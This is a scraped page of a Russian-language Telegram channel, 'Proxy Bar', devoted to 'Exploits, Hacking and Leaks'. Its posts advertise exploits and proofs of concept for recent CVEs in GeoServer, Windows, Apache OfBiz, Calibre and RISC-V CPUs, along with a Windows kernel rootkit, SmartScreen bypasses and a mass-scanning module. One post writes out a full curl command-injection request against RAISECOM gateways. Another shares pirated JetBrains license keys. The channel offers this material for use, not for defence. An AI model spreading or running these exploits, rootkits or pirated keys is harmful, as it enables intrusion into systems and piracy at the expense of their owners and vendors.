Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.28K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2024-7120 RAISECOM Gateway Devices
*
WriteUp
*
Exploit command injection
curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
-H 'Accept: */*' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Connection: keep-alive'
👍5🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC

#FU
👍24🔥8😱5
CVE-2024-36401 GeoServer
*
POC мы уже публиковали, но тут прям fullH0use
*
Полный exploit + модуль для Mass Scanning
*
Download exploit
🔥16👍1
JetBrains Keys
*
Ключи истекают 14 сентября 2026 г.
*
ВСЕ ПРОДУКТЫ !!!
*
Link
🔥45👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Windows AppLocker Driver (appid.sys)
*
LPE
*
exploit

#windows #lpe
🔥19👍7
🔥20👍6😱1
shadow-rs
*
Windows Kernel Rootkit
*
Лангуаге: RUST
*
link

#rootkit #windows #rust
👍11🔥5
А вы читали когда либо спецификации на C&C ? 👍
*
Документ серьезный, даже RFC присутствует
*
Open Source C&C Specification
👍10🔥4
SLUBStick - атака на кэш ядра linux
*
Суть атаки сводится к перекрестному кэшированию ядра, перетекает из limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).
Затестили на: ядра 5.9 и 6.2 _ x32/x64
Но то ладно, интересно другое, использовались 9 CVE -)
Но то ладно, защита ядер SMEP/SMAP/KASLR - в упор не видят атаки -)
*
В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit
*
За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения
*
Жирный хрустящий slubstick.pdf


#linux #vuln
🔥15👍6
Linux для пращуров и внуков и пенсионеров
*
OSEDUCONF - 2022 год
*
глянуть

#real_bad_ass
🔥18😱3
👍19
This media is not supported in your browser
VIEW IN TELEGRAM
SmartScreen - четыре новых метода по демонтажу
*
writeUP
*
repo
🔥14👍2
бгг
systemctl --revert-mylast-fuckup


#MUhumor
👍19🔥5
Apache OfBiz vulns
*
Полный набор: POCов, RCEёв, CURLов, Burpсьютов
(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)
*
// lInK*/

#apache
🔥13
CVE-2024-6782
*
Caliber 6.9.0 ~ 7.14.0 remote code execution
*
exploit
👍13
🔥61👍14😱14
This media is not supported in your browser
VIEW IN TELEGRAM
GhostWrite уязвимость CPU
*
Ну если совсем коротко то: атака нарушает все что можно, песочница/контейнер/виртуальные машины.
GhostWrite записывает и читает произвольную физическую память на затронутых ЦП RISC-V
*
ЗаБилдить:
gcc -march="rv64gvzve64x" ghostwrite.c -o ghostwrite

*
POC exploit
*
WriteUp wtf

#kernel #cpu
👍16😱8🔥4
Bug Bounty hunting КУРС
*
download
👍20🔥11😱3
Ultimate Hardware Hacking Gear Guide
*
PDF 170 страниц

#hrdwr
CVE-2024-21683 0-click RCE
*
Затронуты версии от Win server 2000 до Win server 2025
*
Дырка в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов
*
Пропатчено в июле
*
Exploit (репозитории банят, но мы скачали)))

#rce #winsrv
🔥36👍6